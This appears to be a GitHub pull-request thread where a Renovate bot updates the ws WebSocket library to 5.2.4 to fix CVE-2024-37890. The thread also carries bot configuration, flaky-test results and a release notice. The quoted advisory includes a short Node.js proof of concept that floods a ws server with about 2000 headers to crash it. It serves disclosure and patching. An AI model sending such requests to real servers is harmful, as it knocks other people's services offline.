dependency: update dependency ws to v5.2.4 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
ws	5.2.3 -> 5.2.4

GitHub Vulnerability Alerts

CVE-2024-37890

Impact

A request with a number of headers exceeding theserver.maxHeadersCount threshold could be used to crash a ws server.

Proof of concept

const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});

Patches

The vulnerability was fixed in ws@8.17.1 (websockets/ws@e55e510) and backported to ws@7.5.10 (websockets/ws@22c2876), ws@6.2.3 (websockets/ws@eeb76d3), and ws@5.2.4 (websockets/ws@4abd8f6)

Workarounds

In vulnerable versions of ws, the issue can be mitigated in the following ways:

1. Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent.
2. Set server.maxHeadersCount to 0 so that no limit is applied.

Credits

The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.

References

• https://github.com/websockets/ws/issues/2230
• https://github.com/websockets/ws/pull/2231

---

Release Notes

websockets/ws (ws)

v5.2.4

Compare Source

Bug fixes

• Backported e55e510 to the 5.x release line (4abd8f6).

---

Configuration

📅 Schedule: Branch creation - "" in timezone America/New_York, Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR has been generated by Mend Renovate. View repository job log here.

[cypress-app-bot]

See the guidelines for reviewing dependency updates for info on how to review dependency update PRs.

[renovate]

Edited/Blocked Notification

Renovate will not automatically rebase this PR, because it does not recognize the last commit author and assumes somebody else may have edited the PR.

You can manually request rebase by checking the rebase/retry box above.

⚠️ Warning: custom changes will be lost.

[cypress]

5 flaky tests on run #55836 ↗︎

0

29292

1328

0

5

Details:

add changelog entry
Project: cypress	Commit: c8e2ec1e76
Status: Passed	Duration: 21:54 💡
Started: Jun 19, 2024 6:38 PM	Ended: Jun 19, 2024 7:00 PM

  migration.cy.ts • 1 flaky test • launchpad-e2e

View Output

Test		Artifacts
Migration > shows error if plugins file throws an error		Test Replay Screenshots

  commands/net_stubbing.cy.ts • 3 flaky tests • 5x-driver-webkit

View Output

Test		Artifacts
network stubbing > intercepting request > can delay and throttle a StaticResponse		</td> </tr> <tr> <td colspan="2"> <a href="https://cloud.cypress.io/projects/ypt4pf/runs/55836/overview/ebb5ad5f-db22-4913-a26e-2bd0a7c8af87?reviewViewBy=FLAKY&utm_source=github&utm_medium=flaky&utm_campaign=view%20test"> ... > with `resourceType` > can match a proxied image request by resourceType </a> </td> <td> </td> </tr> <tr> <td colspan="2"> <a href="https://cloud.cypress.io/projects/ypt4pf/runs/55836/overview/5a6fa344-58bf-4c94-b917-c744b7b045d9?reviewViewBy=FLAKY&utm_source=github&utm_medium=flaky&utm_campaign=view%20test"> ... > stops waiting when an xhr request is canceled </a> </td> <td> </td> </tr></table>   angular.cy.ts • 1 flaky test • webpack-dev-server View Output Test Artifacts angular-15 > test behaviors > should mount a passing test Test Replay Screenshots Review all test suite changes for PR #29698 ↗︎

[cypress-bot]

Released in 13.13.0.

This comment thread has been locked. If you are still experiencing this issue after upgrading to
Cypress v13.13.0, please open a new issue.